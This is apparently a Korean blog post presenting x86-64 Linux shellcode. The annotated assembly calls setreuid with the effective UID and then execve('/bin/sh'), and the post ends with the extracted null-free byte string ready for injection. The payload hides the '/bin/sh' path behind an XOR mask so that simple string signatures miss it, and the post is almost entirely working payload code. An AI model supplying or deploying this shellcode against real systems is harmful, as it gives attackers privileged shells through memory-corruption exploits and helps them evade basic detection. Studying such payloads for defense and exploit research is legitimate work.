System/Linux
linux x64 쉘코드
bbolmin
2013. 12. 15. 13:07
# Target: Linux x86-64, GNU as, AT&T syntax (op src, dst).
# Raw syscall convention: %rax = syscall number, arguments in %rdi, %rsi, %rdx;
# the result comes back in %rax.
#
# Sequence: geteuid() -> setreuid(euid, euid) -> execve("/bin/sh", NULL, NULL) -> exit().
#
# Syscall numbers are built with xor+add, and the path is stored XOR-masked and
# unmasked at run time. As a result the assembled bytes contain no 0x00 and no
# literal "/bin/sh", so a plain string match on the payload will not find the path.
# The execve of /bin/sh itself is unchanged and remains visible to syscall-level
# auditing.
.globl main
main:
    xor %rax, %rax
    add $0x6b, %rax                     # %rax = 0x6b (107)
    syscall                             # geteuid: 107 is geteuid on x86-64 (getuid is 102 / 0x66)

    mov %rax, %rdi                      # arg1 (ruid) = value returned above
    mov %rax, %rsi                      # arg2 (euid) = same value
    xor %rax, %rax
    add $0x71, %rax                     # %rax = 0x71 (113)
    syscall                             # setreuid(ruid, euid)

    xor %rax, %rax                      # redundant: the next mov overwrites all of %rax
    mov $0xaac2d985c4c3c885, %rax       # masked path: "/bin/sh\0" XOR 0xaa..aa
    mov $0xaaaaaaaaaaaaaaaa, %rcx       # 8-byte XOR mask
    xor %rcx, %rax                      # %rax = 0x0068732f6e69622f = "/bin/sh\0" (little-endian)
    push %rax                           # place the NUL-terminated path on the stack
    mov %rsp, %rdi                      # arg1 (filename) = pointer to that stack slot
    xor %rsi, %rsi                      # arg2 (argv) = NULL
    xor %rdx, %rdx                      # arg3 (envp) = NULL
    xor %rax, %rax
    add $0x3b, %rax                     # %rax = 0x3b (59)
    syscall                             # execve(filename, NULL, NULL); returns only on failure

    # Reached only if execve failed.
    # NOTE(review): exit takes its status in %rdi, which is not cleared here and
    # still holds the stack pointer set above; clearing %rsi has no effect on exit.
    xor %rsi, %rsi
    xor %rax, %rax
    add $0x3c, %rax                     # %rax = 0x3c (60)
    syscall                             # exit
- 0xaac2d985c4c3c885는 NUL 종료 문자를 포함한 8바이트 문자열 "/bin/sh\0"(리틀 엔디언으로 0x0068732f6e69622f)을 0xaaaaaaaaaaaaaaaa와 xor 해놓은 값이며, 실행 시 같은 값으로 다시 xor 하여 원래 문자열을 복원한다
[뽑아낸 쉘코드]
- setreuid + execve + exit
"\x48\x31\xc0\x48\x83\xc0\x6b\x0f\x05\x48\x89\xc7\x48\x89\xc6\x48\x31\xc0\x48\x83\xc0\x71\x0f\x05\x48\x31\xc0\x48\xb8\x85\xc8\xc3\xc4\x85\xd9\xc2\xaa\x48\xb9\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x48\x31\xc8\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05\x48\x31\xf6\x48\x31\xc0\x48\x83\xc0\x3c\x0f\x05"